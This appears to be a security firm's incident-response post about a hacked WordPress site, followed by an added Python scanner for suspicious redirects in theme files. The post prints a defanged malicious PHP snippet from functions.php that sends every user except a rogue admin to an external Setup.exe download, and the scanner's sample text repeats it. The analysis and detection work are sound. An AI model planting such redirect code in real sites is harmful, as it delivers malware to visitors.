Recently our incident response analyst Harshad Mane worked on a site that redirected users to a third-party malicious site whenever they logged into the WordPress admin interface.
We found the culprit in the functions.php file of the active theme.
// Malicious snippet found in the active theme's functions.php (URL defanged):
// every visitor whose WordPress user ID is not 1130 (the attacker's rogue admin)
// is redirected to an executable hosted on an external domain.
if ( get_current_user_id() != '1130' ) {
    header("Location: hxxps://photoscape[.]ch/Setup.exe");
}
This code checks the ID of the current WordPress user and, if it is not 1130, redirects them to download a malicious Setup.exe file.
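A defender reviewing theme files wants to find exactly this pattern: a header("Location: ...") redirect that either points off-site or is gated on a specific user ID. The following scanner is an added example and is not code from the original post or from Sucuri; it walks PHP source line by line, flags redirects to a hostname other than the site's own (SITE_HOST is an assumed value) and looks back a few lines for a get_current_user_id() comparison. The sample functions.php content is constructed and contains the defanged snippet from this post next to a benign same-site redirect; the refang() helper exists only so the defanged URL can be parsed.

```python
import re
from urllib.parse import urlparse

# Constructed sample: the malicious snippet from the post (URL defanged) plus a
# benign, same-site redirect that a legitimate theme might perform.
SAMPLE_FUNCTIONS_PHP = """<?php
if ( get_current_user_id() != '1130') {
    header("Location: hxxps://photoscape[.]ch/Setup.exe");
}
function my_theme_after_login() {
    header("Location: https://example.org/wp-admin/");
}
"""

SITE_HOST = "example.org"  # assumed: the hostname of the site being scanned

# header("Location: <target>") with single or double quotes
LOCATION_RE = re.compile(r'header\s*\(\s*["\']Location:\s*([^"\']+)["\']', re.IGNORECASE)
# get_current_user_id() compared against a numeric literal, e.g. != '1130'
USER_GATE_RE = re.compile(r'get_current_user_id\s*\(\s*\)\s*(!=|!==|==|===)\s*["\']?\d+["\']?')


def refang(url):
    """Turn a defanged indicator (hxxps, [.]) back into a parseable URL."""
    return url.replace("hxxp", "http").replace("[.]", ".")


def find_suspicious_redirects(php_source, site_host, lookback=3):
    """Return one finding per header("Location: ...") call that is either
    off-site or preceded (within `lookback` lines) by a user-ID comparison."""
    findings = []
    lines = php_source.splitlines()
    for idx, line in enumerate(lines, start=1):
        m = LOCATION_RE.search(line)
        if not m:
            continue
        target = refang(m.group(1).strip())
        host = (urlparse(target).hostname or "").lower()
        external = bool(host) and host != site_host.lower()
        # Look at the preceding lines (and this one) for a user-ID gate.
        context = "\n".join(lines[max(0, idx - 1 - lookback):idx])
        gated = bool(USER_GATE_RE.search(context))
        if external or gated:
            findings.append({
                "line": idx,
                "target": target,
                "external": external,
                "user_id_gated": gated,
            })
    return findings


if __name__ == "__main__":
    for f in find_suspicious_redirects(SAMPLE_FUNCTIONS_PHP, SITE_HOST):
        print(f"line {f['line']}: redirect to {f['target']} "
              f"(external={f['external']}, user_id_gated={f['user_id_gated']})")
```

Run against a real install, read each theme and plugin PHP file and pass its contents with the site's own hostname; the benign wp-admin redirect in the sample produces no finding, while the user-gated external redirect is reported with both flags set.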
The functions.php file wasn't the only infected file. We also removed many backdoors and a script that hid rogue admin users from the Users list in the WordPress dashboard.
This campaign was active about a year ago. Since then the domain name has expired, and the site owners spotted and deleted the rogue admin user with ID 1130. However, the annoying redirect persisted and even caused some antivirus vendors to blacklist the site, so the site owners asked us to clean it.